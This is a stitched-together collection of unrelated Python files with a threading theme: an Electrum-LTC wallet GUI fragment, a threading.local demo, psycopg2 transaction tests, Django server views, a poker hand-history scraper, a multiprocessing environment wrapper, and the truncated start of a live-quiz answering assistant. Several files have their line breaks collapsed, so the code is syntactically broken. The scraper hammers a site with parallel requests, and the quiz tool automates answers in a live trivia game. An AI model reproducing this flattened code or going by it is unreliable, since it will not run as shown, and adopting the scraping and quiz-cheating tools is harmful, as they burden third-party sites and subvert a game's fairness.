'[size=15dp]%s[/size]\n%s' %(n, status) def get_max_amount(self): inputs = self.wallet.get_spendable_coins(None) addr = str(self.send_screen.screen.address) or self.wallet.dummy_address() outputs = [(TYPE_ADDRESS, addr, '!')] tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config) amount = tx.output_value() return format_satoshis_plain(amount, self.decimal_point()) def format_amount(self, x, is_diff=False, whitespaces=False): return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces) def format_amount_and_units(self, x): return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit @profiler def update_wallet(self, *dt): self._trigger_update_status() if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()): self.update_tabs() def notify(self, message): try: global notification, os if not notification: from plyer import notification icon = (os.path.dirname(os.path.realpath(__file__)) + '/../../' + self.icon) notification.notify('Electrum-LTC', message, app_icon=icon, app_name='Electrum-LTC') except ImportError: Logger.Error('Notification: needs plyer; `sudo pip install plyer`') def on_pause(self): # pause nfc if self.nfcscanner: self.nfcscanner.nfc_disable() return True def on_resume(self): if self.nfcscanner: self.nfcscanner.nfc_enable() # workaround p4a bug: # show an empty info bubble, to refresh the display self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None) def 
on_size(self, instance, value): width, height = value self._orientation = 'landscape' if width > height else 'portrait' self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone' def on_ref_label(self, label, touch): if label.touched: label.touched = False self.qr_dialog(label.name, label.data, True) else: label.touched = True self._clipboard.copy(label.data) Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.'))) def set_send(self, address, amount, label, message): self.send_payment(address, amount=amount, label=label, message=message) def show_error(self, error, width='200dp', pos=None, arrow_pos=None, exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0, modal=False): ''' Show a error Message Bubble. ''' self.show_info_bubble( text=error, icon=icon, width=width, pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit, duration=duration, modal=modal) def show_info(self, error, width='200dp', pos=None, arrow_pos=None, exit=False, duration=0, modal=False): ''' Show a Info Message Bubble. ''' self.show_error(error, icon='atlas://gui/kivy/theming/light/important', duration=duration, modal=modal, exit=exit, pos=pos, arrow_pos=arrow_pos) def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0, arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False): '''Method to show a Information Bubble .. parameters:: text: Message to be displayed pos: position for the bubble duration: duration the bubble remains on screen. 0 = click to hide width: width of the Bubble arrow_pos: arrow position for the bubble ''' info_bubble = self.info_bubble if not info_bubble: info_bubble = self.info_bubble = Factory.InfoBubble() win = Window if info_bubble.parent: win.remove_widget(info_bubble if not info_bubble.modal else info_bubble._modal_view) if not arrow_pos: info_bubble.show_arrow = False else: info_bubble.show_arrow = True info_bubble.arrow_pos = arrow_pos img = info_bubble.ids.img if text == 'texture': # icon holds a texture not a source image # display the texture in full screen text = '' img.texture = icon info_bubble.fs = True info_bubble.show_arrow = False img.allow_stretch = True info_bubble.dim_background = True info_bubble.background_image = 'atlas://gui/kivy/theming/light/card' else: info_bubble.fs = False info_bubble.icon = icon #if img.texture and img._coreimage: # img.reload() img.allow_stretch = False info_bubble.dim_background = False info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble' info_bubble.message = text if not pos: pos = (win.center[0], win.center[1] - (info_bubble.height/2)) info_bubble.show(pos, duration, width, modal=modal, exit=exit) def tx_dialog(self, tx): from uix.dialogs.tx_dialog import TxDialog d = TxDialog(self, tx) d.open() def sign_tx(self, *args): threading.Thread(target=self._sign_tx, args=args).start() def _sign_tx(self, tx, password, on_success, on_failure): try: self.wallet.sign_transaction(tx, password) except InvalidPassword: Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN"))) return Clock.schedule_once(lambda dt: on_success(tx)) def _broadcast_thread(self, tx, on_complete): ok, txid = self.network.broadcast(tx) Clock.schedule_once(lambda dt: on_complete(ok, txid)) def broadcast(self, tx, pr=None): def on_complete(ok, msg): if ok: self.show_info(_('Payment sent.')) if self.send_screen: self.send_screen.do_clear() if pr: self.wallet.invoices.set_paid(pr, tx.txid()) self.wallet.invoices.save() self.update_tab('invoices') else: 
self.show_error(msg) if self.network and self.network.is_connected(): self.show_info(_('Sending')) threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start() else: self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected')) def description_dialog(self, screen): from uix.dialogs.label_dialog import LabelDialog text = screen.message def callback(text): screen.message = text d = LabelDialog(_('Enter description'), text, callback) d.open() @profiler def amount_dialog(self, screen, show_max): from uix.dialogs.amount_dialog import AmountDialog amount = screen.amount if amount: amount, u = str(amount).split() assert u == self.base_unit def cb(amount): screen.amount = amount popup = AmountDialog(show_max, amount, cb) popup.open() def protected(self, msg, f, args): if self.wallet.has_password(): self.password_dialog(msg, f, args) else: apply(f, args + (None,)) def delete_wallet(self): from uix.dialogs.question import Question basename = os.path.basename(self.wallet.storage.path) d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet) d.open() def _delete_wallet(self, b): if b: basename = os.path.basename(self.wallet.storage.path) self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ()) def __delete_wallet(self, pw): wallet_path = self.get_wallet_path() dirname = os.path.dirname(wallet_path) basename = os.path.basename(wallet_path) if self.wallet.has_password(): try: self.wallet.check_password(pw) except: self.show_error("Invalid PIN") return self.stop_wallet() os.unlink(wallet_path) self.show_error("Wallet removed:" + basename) d = os.listdir(dirname) name = 'default_wallet' new_path = os.path.join(dirname, name) self.load_wallet_by_name(new_path) def show_seed(self, label): self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,)) def _show_seed(self, label, password): if self.wallet.has_password() and password is None: return keystore = self.wallet.keystore try: seed = keystore.get_seed(password) passphrase = keystore.get_passphrase(password) except: self.show_error("Invalid PIN") return label.text = _('Seed') + ':\n' + seed if passphrase: label.text += '\n\n' + _('Passphrase') + ': ' + passphrase def change_password(self, cb): if self.wallet.has_password(): self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,)) else: self._change_password(cb, None) def _change_password(self, cb, old_password): if self.wallet.has_password(): if old_password is None: return try: self.wallet.check_password(old_password) except InvalidPassword: self.show_error("Invalid PIN") return self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,)) def _change_password2(self, cb, old_password, new_password): self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password)) def _change_password3(self, cb, old_password, new_password, confirmed_password): if new_password == confirmed_password: self.wallet.update_password(old_password, new_password) cb() else: self.show_error("PIN numbers do not match") def password_dialog(self, msg, f, args): def callback(pw): Clock.schedule_once(lambda x: apply(f, args + (pw,)), 0.1) if self._password_dialog is None: from uix.dialogs.password_dialog import PasswordDialog self._password_dialog = PasswordDialog() self._password_dialog.init(msg, callback) self._password_dialog.open()
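# A minimal sketch of the threading pattern used by sign_tx() and broadcast()
# above: run the blocking work (signing, broadcasting) in a background thread,
# then hop back to the Kivy main thread with Clock.schedule_once before
# touching any widget. The helper name below is illustrative only and is not
# part of Electrum-LTC; it assumes Kivy is installed as in the file above.
import threading
from kivy.clock import Clock

def run_in_background(blocking_fn, on_done):
    """Call blocking_fn() off the UI thread and deliver its result on it."""
    def _target():
        result = blocking_fn()
        # Clock.schedule_once always runs the callback on the Kivy main thread.
        Clock.schedule_once(lambda dt: on_done(result))
    threading.Thread(target=_target).start()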
25.thread_Thread-specific Data.py
# While some resources need to be locked so multiple threads can use them,
# others need to be protected so that they are hidden from view in threads
# that do not “own” them. The local() function creates an object capable of
# hiding values from view in separate threads.

import random
import threading
import logging

logging.basicConfig(level=logging.DEBUG,
                    format='(%(threadName)-10s) %(message)s',
                    )


def show_value(data):
    try:
        val = data.value
    except AttributeError:
        logging.debug('No value yet')
    else:
        logging.debug('value=%s', val)


def worker(data):
    show_value(data)
    data.value = random.randint(1, 100)
    show_value(data)


local_data = threading.local()
show_value(local_data)
local_data.value = 1000
show_value(local_data)

for i in range(2):
    t = threading.Thread(target=worker, args=(local_data,))
    t.start()
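# One refinement the demo above hints at: a thread that has not assigned
# data.value yet hits AttributeError in show_value(). Subclassing
# threading.local gives every thread its own default, because the subclass
# __init__ runs again in each thread that first touches the object.
# This is a minimal sketch and not part of the original example.
import threading

class LocalWithDefault(threading.local):
    def __init__(self, value=0):
        self.value = value

shared = LocalWithDefault(value=1000)

def worker():
    # Each thread starts from the default 1000, independent of the others.
    print(threading.current_thread().name, shared.value)
    shared.value += 1

for _ in range(2):
    threading.Thread(target=worker).start()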
test_transaction.py
#!/usr/bin/env python # test_transaction - unit test on transaction behaviour # # Copyright (C) 2007-2011 Federico Di Gregorio <fog@debian.org> # # psycopg2 is free software: you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published # by the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # In addition, as a special exception, the copyright holders give # permission to link this program with the OpenSSL library (or with # modified versions of OpenSSL that use the same license as OpenSSL), # and distribute linked combinations including the two. # # You must obey the GNU Lesser General Public License in all respects for # all of the code used other than OpenSSL. # # psycopg2 is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or # FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public # License for more details. import threading from .testutils import unittest, ConnectingTestCase, skip_before_postgres, slow import psycopg2 from psycopg2.extensions import ( ISOLATION_LEVEL_SERIALIZABLE, STATUS_BEGIN, STATUS_READY) class TransactionTests(ConnectingTestCase): def setUp(self): ConnectingTestCase.setUp(self) self.conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE) curs = self.conn.cursor() curs.execute(''' CREATE TEMPORARY TABLE table1 ( id int PRIMARY KEY )''') # The constraint is set to deferrable for the commit_failed test curs.execute(''' CREATE TEMPORARY TABLE table2 ( id int PRIMARY KEY, table1_id int, CONSTRAINT table2__table1_id__fk FOREIGN KEY (table1_id) REFERENCES table1(id) DEFERRABLE)''') curs.execute('INSERT INTO table1 VALUES (1)') curs.execute('INSERT INTO table2 VALUES (1, 1)') self.conn.commit() def test_rollback(self): # Test that rollback undoes changes curs = self.conn.cursor() curs.execute('INSERT INTO table2 VALUES (2, 1)') # Rollback takes us from BEGIN state to READY state self.assertEqual(self.conn.status, STATUS_BEGIN) self.conn.rollback() self.assertEqual(self.conn.status, STATUS_READY) curs.execute('SELECT id, table1_id FROM table2 WHERE id = 2') self.assertEqual(curs.fetchall(), []) def test_commit(self): # Test that commit stores changes curs = self.conn.cursor() curs.execute('INSERT INTO table2 VALUES (2, 1)') # Rollback takes us from BEGIN state to READY state self.assertEqual(self.conn.status, STATUS_BEGIN) self.conn.commit() self.assertEqual(self.conn.status, STATUS_READY) # Now rollback and show that the new record is still there: self.conn.rollback() curs.execute('SELECT id, table1_id FROM table2 WHERE id = 2') self.assertEqual(curs.fetchall(), [(2, 1)]) def test_failed_commit(self): # Test that we can recover from a failed commit. # We use a deferred constraint to cause a failure on commit. 
curs = self.conn.cursor() curs.execute('SET CONSTRAINTS table2__table1_id__fk DEFERRED') curs.execute('INSERT INTO table2 VALUES (2, 42)') # The commit should fail, and move the cursor back to READY state self.assertEqual(self.conn.status, STATUS_BEGIN) self.assertRaises(psycopg2.IntegrityError, self.conn.commit) self.assertEqual(self.conn.status, STATUS_READY) # The connection should be ready to use for the next transaction: curs.execute('SELECT 1') self.assertEqual(curs.fetchone()[0], 1) class DeadlockSerializationTests(ConnectingTestCase): """Test deadlock and serialization failure errors.""" def connect(self): conn = ConnectingTestCase.connect(self) conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE) return conn def setUp(self): ConnectingTestCase.setUp(self) curs = self.conn.cursor() # Drop table if it already exists try: curs.execute("DROP TABLE table1") self.conn.commit() except psycopg2.DatabaseError: self.conn.rollback() try: curs.execute("DROP TABLE table2") self.conn.commit() except psycopg2.DatabaseError: self.conn.rollback() # Create sample data curs.execute(""" CREATE TABLE table1 ( id int PRIMARY KEY, name text) """) curs.execute("INSERT INTO table1 VALUES (1, 'hello')") curs.execute("CREATE TABLE table2 (id int PRIMARY KEY)") self.conn.commit() def tearDown(self): curs = self.conn.cursor() curs.execute("DROP TABLE table1") curs.execute("DROP TABLE table2") self.conn.commit() ConnectingTestCase.tearDown(self) @slow def test_deadlock(self): self.thread1_error = self.thread2_error = None step1 = threading.Event() step2 = threading.Event() def task1(): try: conn = self.connect() curs = conn.cursor() curs.execute("LOCK table1 IN ACCESS EXCLUSIVE MODE") step1.set() step2.wait() curs.execute("LOCK table2 IN ACCESS EXCLUSIVE MODE") except psycopg2.DatabaseError as exc: self.thread1_error = exc step1.set() conn.close() def task2(): try: conn = self.connect() curs = conn.cursor() step1.wait() curs.execute("LOCK table2 IN ACCESS EXCLUSIVE MODE") step2.set() curs.execute("LOCK table1 IN ACCESS EXCLUSIVE MODE") except psycopg2.DatabaseError as exc: self.thread2_error = exc step2.set() conn.close() # Run the threads in parallel. The "step1" and "step2" events # ensure that the two transactions overlap. thread1 = threading.Thread(target=task1) thread2 = threading.Thread(target=task2) thread1.start() thread2.start() thread1.join() thread2.join() # Exactly one of the threads should have failed with # TransactionRollbackError: self.assertFalse(self.thread1_error and self.thread2_error) error = self.thread1_error or self.thread2_error self.assertTrue(isinstance( error, psycopg2.extensions.TransactionRollbackError)) @slow def test_serialisation_failure(self): self.thread1_error = self.thread2_error = None step1 = threading.Event() step2 = threading.Event() def task1(): try: conn = self.connect() curs = conn.cursor() curs.execute("SELECT name FROM table1 WHERE id = 1") curs.fetchall() step1.set() step2.wait() curs.execute("UPDATE table1 SET name='task1' WHERE id = 1") conn.commit() except psycopg2.DatabaseError as exc: self.thread1_error = exc step1.set() conn.close() def task2(): try: conn = self.connect() curs = conn.cursor() step1.wait() curs.execute("UPDATE table1 SET name='task2' WHERE id = 1") conn.commit() except psycopg2.DatabaseError as exc: self.thread2_error = exc step2.set() conn.close() # Run the threads in parallel. The "step1" and "step2" events # ensure that the two transactions overlap. 
thread1 = threading.Thread(target=task1) thread2 = threading.Thread(target=task2) thread1.start() thread2.start() thread1.join() thread2.join() # Exactly one of the threads should have failed with # TransactionRollbackError: self.assertFalse(self.thread1_error and self.thread2_error) error = self.thread1_error or self.thread2_error self.assertTrue(isinstance( error, psycopg2.extensions.TransactionRollbackError)) class QueryCancellationTests(ConnectingTestCase): """Tests for query cancellation.""" def setUp(self): ConnectingTestCase.setUp(self) self.conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE) @skip_before_postgres(8, 2) def test_statement_timeout(self): curs = self.conn.cursor() # Set a low statement timeout, then sleep for a longer period. curs.execute('SET statement_timeout TO 10') self.assertRaises(psycopg2.extensions.QueryCanceledError, curs.execute, 'SELECT pg_sleep(50)') def test_suite(): return unittest.TestLoader().loadTestsFromName(__name__) if __name__ == "__main__": unittest.main()
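# The step1/step2 events in the deadlock and serialization tests above force
# the two transactions to overlap deterministically. Stripped of the database
# calls, the coordination pattern looks roughly like this (illustrative sketch
# only, not part of the test suite):
import threading

step1 = threading.Event()
step2 = threading.Event()

def task1():
    # ... acquire resource A here ...
    step1.set()      # tell task2 that A is held
    step2.wait()     # block until task2 holds B
    # ... now try to acquire resource B: guaranteed contention ...

def task2():
    step1.wait()     # block until task1 holds A
    # ... acquire resource B here ...
    step2.set()      # tell task1 that B is held
    # ... now try to acquire resource A: guaranteed contention ...

t1, t2 = threading.Thread(target=task1), threading.Thread(target=task2)
t1.start(); t2.start()
t1.join(); t2.join()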
views.py
import threading from datetime import datetime from django.contrib import messages from django.core.cache import cache from django.shortcuts import HttpResponseRedirect, reverse from django.views.generic import FormView from django.views.generic import View from django.views.generic.list import ListView from dispatcher.models import Server from dispatcher.manage import update_token from problem.models import Problem from problem.tasks import upload_problem_to_judge_server from .forms import ServerEditForm, ServerUpdateTokenForm from ..base_views import BaseCreateView, BaseUpdateView, BaseBackstageMixin class ServerCreate(BaseCreateView): form_class = ServerEditForm template_name = 'backstage/server/server_add.jinja2' def get_redirect_url(self, instance): return reverse('backstage:server') class ServerUpdate(BaseUpdateView): form_class = ServerEditForm template_name = 'backstage/server/server_edit.jinja2' queryset = Server.objects.all() def get_redirect_url(self, instance): return reverse('backstage:server') class ServerList(BaseBackstageMixin, ListView): template_name = 'backstage/server/server.jinja2' queryset = Server.objects.all() context_object_name = 'server_list' def get_context_data(self, **kwargs): data = super(ServerList, self).get_context_data(**kwargs) data['server_synchronize_status_detail'] = cache.get('server_synchronize_status_detail', '') data['server_synchronize_status'] = cache.get('server_synchronize_status', 0) return data class ServerRefresh(BaseBackstageMixin, View): def post(self, request, pk): server = Server.objects.get(pk=pk) server.serverproblemstatus_set.all().delete() messages.success(request, "Server status has been refreshed.") return HttpResponseRedirect(reverse('backstage:server')) class ServerEnableOrDisable(BaseBackstageMixin, View): def post(self, request, pk): server = Server.objects.get(pk=pk) server.enabled = not server.enabled server.save(update_fields=['enabled']) return HttpResponseRedirect(reverse('backstage:server')) class ServerDelete(BaseBackstageMixin, View): def post(self, request, pk): server = Server.objects.get(pk=pk) server.delete() messages.success(request, "Server <strong>%s</strong> is successfully removed." % server.name) return HttpResponseRedirect(reverse('backstage:server')) class ServerUpdateToken(BaseBackstageMixin, FormView): form_class = ServerUpdateTokenForm template_name = 'backstage/server/server_edit.jinja2' def post(self, request, *args, **kwargs): form = self.get_form() if form.is_valid(): server = Server.objects.get(pk=kwargs.get('pk')) if update_token(server, form.cleaned_data['new_password']): messages.success(request, 'Token update succeeded.') return HttpResponseRedirect(reverse('backstage:server')) messages.error(request, 'Update token failed. Please recheck your server status.') return HttpResponseRedirect(reverse('backstage:server')) class ServerSynchronize(BaseBackstageMixin, View): def post(self, request, pk): def synchronize_func(server): count = Problem.objects.all().count() for idx, problem in enumerate(Problem.objects.all(), start=1): cache.set('server_synchronize_status_detail', '%d / %d' % (idx, count), 60) cache.set('server_synchronize_status', idx / count * 100, 60) if not upload_problem_to_judge_server(problem, server): return server.last_synchronize_time = datetime.now() server.save(update_fields=['last_synchronize_time']) server = Server.objects.get(pk=pk) threading.Thread(target=synchronize_func, args=(server,)).start() return HttpResponseRedirect(reverse('backstage:server'))
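# The ServerSynchronize view above runs the upload loop in a plain
# threading.Thread and reports progress through Django's cache so the list
# view can poll it. The same idea in isolation, with a dict standing in for
# the cache and a sleep standing in for the upload call, looks like this
# (illustrative sketch only, not part of the Django app):
import threading
import time

progress = {"detail": "", "percent": 0}

def synchronize(items):
    total = len(items)
    for idx, item in enumerate(items, start=1):
        time.sleep(0.05)                      # placeholder for the real upload
        progress["detail"] = "%d / %d" % (idx, total)
        progress["percent"] = idx / total * 100

t = threading.Thread(target=synchronize, args=(list(range(20)),))
t.start()
while t.is_alive():
    print(progress["detail"], "%.0f%%" % progress["percent"])
    time.sleep(0.2)
t.join()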
Scraper_Main.py
import requests
from bs4 import BeautifulSoup
import time
import os
import sys
import threading

#Multi-threaded Hand History Scraper V2.2
#Contact me if you encounter significant connection errors or large numbers of attribute errors being logged.
#Try to keep usage responsible as this script will pull data as quickly as possible and may cause the data host to be unhappy if overused.
#If the total time running is greater than 0.2 seconds per hand either the connection is poor or you have been throttled by the site and should cease use immediately.

timestart = time.time()

def scrape(start,end,fileletter):
    filenumber = 1
    for i in range(start,end):
        try:
            url = "https://anyrandompokernetwork.com/flashclient/gamehistory.php?gnr=%s&key=&nick=&note=" %(i)
            page = requests.get(url).content
            soup = BeautifulSoup(page, "lxml")
            textblock = soup.find("div",{"id":"div_urlcodes"})
            textblock2 = textblock.find("textarea",{"id":"txt_handhistory"})
            textblock2 = str(textblock2)
            textblock2 = textblock2.replace("""<textarea id="txt_handhistory" name="txt_handhistory" style="width:233px;height:50px;">""","")
            textblock2 = textblock2.replace("&lt;br&gt;","<br>")
            textblock2 = textblock2.replace("</textarea>","")
        except AttributeError:
            print "Hand", i, "not processed due to error"
            File = open("Error Log.txt", 'a')
            File.write("Hand %s not processed due to error"%(str(i)))
            File.write("\n")
            File.close()
            continue  # nothing was parsed for this hand, so skip writing it
        except requests.exceptions.ConnectionError:  # an except clause must name an exception class, not a string
            print "ConnectionError"
            time.sleep(30)
            continue  # back off, then move on to the next hand
        File = open("HH - %s%s.txt"%(fileletter,filenumber), 'a')
        if os.path.getsize("C:\Users\Desktop\Python\Betuniq Soup Scraper\HH 1\HH - %s%s.txt" %(fileletter,filenumber)) > 10000000:
            # Current output file has passed ~10 MB, so roll over to the next numbered file.
            filenumber = filenumber + 1
            File = open("HH - %s%s.txt" %(fileletter,filenumber), 'a')
            File.close()
        File = open("HH - %s%s.txt" %(fileletter,filenumber), 'a')
        File.write(textblock2)
        File.write("\n\n")
        File.close()
        print "Hand Number", i, "Processed"
        timeend = time.time()
        print "Total Time Running =", timeend - timestart, "Seconds."

#Enter start/end page numbers for each thread (Leave the 3rd arg alone).
#Feel free to add more threads if you feel you need to quickly expand the scope of data scraped.
#I would suggest each thread having a range of no more than 1000.
t1 = threading.Thread(target=scrape, args=(1,1001,"A"))
t2 = threading.Thread(target=scrape, args=(1001,2001,"B"))
t3 = threading.Thread(target=scrape, args=(2001,3001,"C"))
t4 = threading.Thread(target=scrape, args=(3001,4001,"D"))
t5 = threading.Thread(target=scrape, args=(4001,5001,"E"))

t1.start()
t2.start()
t3.start()
t4.start()
t5.start()

raw_input()
multi_envs_wrapper.py
import numpy as np import multiprocessing as mp from envs_utils import VecEnv, CloudpickleWrapper, clear_mpi_env_vars def worker(remote, parent_remote, env_fn_wrapper): parent_remote.close() env = env_fn_wrapper.x() try: while True: cmd, data = remote.recv() if cmd == 'step': ob, reward, done, info = env.step(data) if done: ob = env.reset() remote.send((ob, reward, done, info)) elif cmd == 'reset': ob = env.reset() remote.send(ob) elif cmd == 'render': remote.send(env.render(mode='rgb_array')) elif cmd == 'close': remote.close() break elif cmd == 'get_spaces_spec': remote.send((env.observation_space, env.action_space, env.spec)) else: raise NotImplementedError except KeyboardInterrupt: print('SubprocVecEnv worker: got KeyboardInterrupt') finally: env.close() class SubprocVecEnv(VecEnv): """ VecEnv that runs multiple environments in parallel in subproceses and communicates with them via pipes. Recommended to use when num_envs > 1 and step() can be a bottleneck. """ def __init__(self, env_fns, spaces=None, context='spawn'): """ Arguments: env_fns: iterable of callables - functions that create environments to run in subprocesses. Need to be cloud-pickleable """ self.waiting = False self.closed = False nenvs = len(env_fns) ctx = mp.get_context(context) self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(nenvs)]) self.ps = [ctx.Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn))) for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)] for p in self.ps: p.daemon = True # if the main process crashes, we should not cause things to hang with clear_mpi_env_vars(): p.start() for remote in self.work_remotes: remote.close() self.remotes[0].send(('get_spaces_spec', None)) observation_space, action_space, self.spec = self.remotes[0].recv() self.viewer = None VecEnv.__init__(self, len(env_fns), observation_space, action_space) def step_async(self, actions): self._assert_not_closed() for remote, action in zip(self.remotes, actions): remote.send(('step', action)) self.waiting = True def step_wait(self): self._assert_not_closed() results = [remote.recv() for remote in self.remotes] self.waiting = False obs, rews, dones, infos = zip(*results) return _flatten_obs(obs), np.stack(rews), np.stack(dones), infos def reset(self): self._assert_not_closed() for remote in self.remotes: remote.send(('reset', None)) return _flatten_obs([remote.recv() for remote in self.remotes]) def close_extras(self): self.closed = True if self.waiting: for remote in self.remotes: remote.recv() for remote in self.remotes: remote.send(('close', None)) for p in self.ps: p.join() def get_images(self): self._assert_not_closed() for pipe in self.remotes: pipe.send(('render', None)) imgs = [pipe.recv() for pipe in self.remotes] return imgs def _assert_not_closed(self): assert not self.closed, "Trying to operate on a SubprocVecEnv after calling close()" def __del__(self): if not self.closed: self.close() def _flatten_obs(obs): assert isinstance(obs, (list, tuple)) assert len(obs) > 0 if isinstance(obs[0], dict): keys = obs[0].keys() return {k: np.stack([o[k] for o in obs]) for k in keys} else: return np.stack(obs)
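# A minimal usage sketch for the SubprocVecEnv above, assuming the `gym`
# package is installed and that the VecEnv base class from envs_utils provides
# the usual reset()/step()/close() wrappers around step_async()/step_wait().
# The environment name and factory below are illustrative.
import gym

def make_env(seed):
    def _thunk():
        env = gym.make("CartPole-v1")
        env.seed(seed)
        return env
    return _thunk

if __name__ == "__main__":
    venv = SubprocVecEnv([make_env(s) for s in range(4)])   # four worker processes
    obs = venv.reset()                                      # stacked observations
    actions = [venv.action_space.sample() for _ in range(4)]
    obs, rewards, dones, infos = venv.step(actions)
    venv.close()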
main.py
# -*- coding:utf-8 -*- """ Million Heroes """ import multiprocessing from multiprocessing import Event from multiprocessing import Pipe import os import win32api import pythoncom from PIL import ImageFilter from threading import Thread import time from argparse import ArgumentParser import string import re import operator from functools import partial from terminaltables import AsciiTable import win32com.client import numpy as np from config import api_key from config import api_version from config import app_id from config import app_key from config import app_secret from config import data_directory from config import enable_chrome from config import image_compress_level from core.nn import * from config import prefer from config import crop_areas from config import reg from core.android import analyze_current_screen_text from core.android import save_screen from core.android import save_record from core.Slicer import * from core.ios import analyze_current_screen_text_ios from core.baiduzhidao import baidu_count from core.baiduzhidao import zhidao_tree from core.baiduzhidao import baidu_qmi_count from core.bingqa import bing_count from core.zhidaoqa import zhidao_count from core.soqa import so_count from core.airplayscr import check_exsit from core.chrome_search import run_browser from core.ocr.baiduocr import get_text_from_image as bai_get_text from core.ocr.spaceocr import get_text_from_image as ocrspace_get_text global isNegativeQuestion global origQuestion global test_key isExceptionGame = False isNegativeQuestion = False origQuestion = "" if prefer[0] == "baidu": get_text_from_image = partial(bai_get_text, app_id=app_id, app_key=app_key, app_secret=app_secret, api_version=api_version[1], timeout=5) elif prefer[0] == "ocrspace": get_test_from_image = partial(ocrspace_get_text, api_key=api_key) def parse_args(): parser = ArgumentParser(description="Million Hero Assistant") parser.add_argument( "-t", "--timeout", type=int, default=5, help="default http request timeout" ) return parser.parse_args() def parse_question_and_answer(text_list): global origQuestion,isExceptionGame question = "" start = 0 for i, keyword in enumerate(text_list): question += keyword if "?" in keyword: start = i + 1 break elif "?" 
in keyword: # 增加中文问号判断 start = i + 1 break elif keyword.endswith("."): start = i + 1 break elif keyword.endswith("。"): start = i + 1 break elif keyword.endswith("_"): # 新增问题里填空下划线的切分判断 start = i + 1 break elif keyword.endswith("是") and isExceptionGame==True: # 仅当知乎模式开启时以“是”字作为题目切分依据 start = i + 1 break elif keyword.endswith("为") and isExceptionGame == True: # 仅当知乎模式开启时以“为”字作为题目切分依据 start = i + 1 break # V4.7修正 如果OCR识别结果是英文字符那么不应以中文的.为切分依据 if question.find('.') >= 0: real_question = question.split(".")[-1] elif question.find('.') >= 0: real_question = question.split(".")[-1] else: if isExceptionGame==False: real_question = question.lstrip(string.digits) else: real_question = question origQuestion = real_question # 新增题目模式识别 global isNegativeQuestion isNegativeQuestion = False if real_question.find(',')>=0: real_question_judge = real_question.split(',')[-1] else: real_question_judge = real_question.split(',')[-1] critical_word_list = [('没有','有'),('未', ''),('没在', '在'),('没出', '出'),('还未', '已'),('不', ''),('是错', '是对')] not_critical_word_list = ['不只','不单','不止','不入','不齿','不耻','不拔','不值'] isNegative = True for critical_word,new_word in critical_word_list: if real_question_judge.find(critical_word)>=0: for not_critical_word in not_critical_word_list: if real_question_judge.find(not_critical_word)>=0: isNegative = False break if isNegative == True: isNegativeQuestion = True real_question = real_question.replace(critical_word, new_word) question =real_question # 遗留问题:懒得改了 直接传值 # 增加识别异常符号处理 for ii in range(start,len(text_list)): text_list[ii] = re.sub(reg, "", text_list[ii]) text_list[ii] = text_list[ii].lower() return isNegativeQuestion, real_question, question, text_list[start:] def pre_process_question(keyword): """ strip charactor and strip ? :param question: :return: """ for char, repl in [("“", ""), ("”", ""), ("?", "")]: keyword = keyword.replace(char, repl) # V4.7修正 如果OCR识别结果是英文字符那么不应以中文的.为切分依据 if keyword.find('.')>=0: keyword = keyword.split(".")[-1] else: keyword = keyword.split(r".")[-1] keywords = keyword.split(" ") keyword = "".join([e.strip("\r\n") for e in keywords if e]) return keyword class SearchThread(Thread): def __init__(self, question,answer,timeout,delword,engine,numofquery=10): Thread.__init__(self) self.question = question self.answer = answer self.timeout = timeout self.engine = engine self.delword = delword self.numofquery = numofquery def run(self): if self.engine == 'baidu': self.result = baidu_count(self.question,self.answer,delword=self.delword,timeout=self.timeout,numofquery=self.numofquery) elif self.engine == 'baiduqmi': self.result = baidu_qmi_count(self.question, self.answer, delword=self.delword, timeout=self.timeout,numofquery=self.numofquery) elif self.engine == 'bing': self.result = bing_count(self.question,self.answer,delword=self.delword,timeout=self.timeout) elif self.engine == 'zhidao': self.result = zhidao_count(self.question, self.answer,delword=self.delword, timeout=self.timeout) elif self.engine == 'so': self.result = so_count(self.question, self.answer,delword=self.delword, timeout=self.timeout) elif self.engine == 'zhidaotree': self.result = zhidao_tree(self.question, self.answer, timeout=self.timeout) elif self.engine == 'speaker': speakword(self.answer) else: self.result = zhidao_count(self.question, self.answer,delword=self.delword, timeout=self.timeout) def get_result(self): return self.result def speakword(word): pythoncom.CoInitialize() speaker = win32com.client.Dispatch("SAPI.SpVoice") speaker.Speak(word) def speak(word): thds = SearchThread(0, 
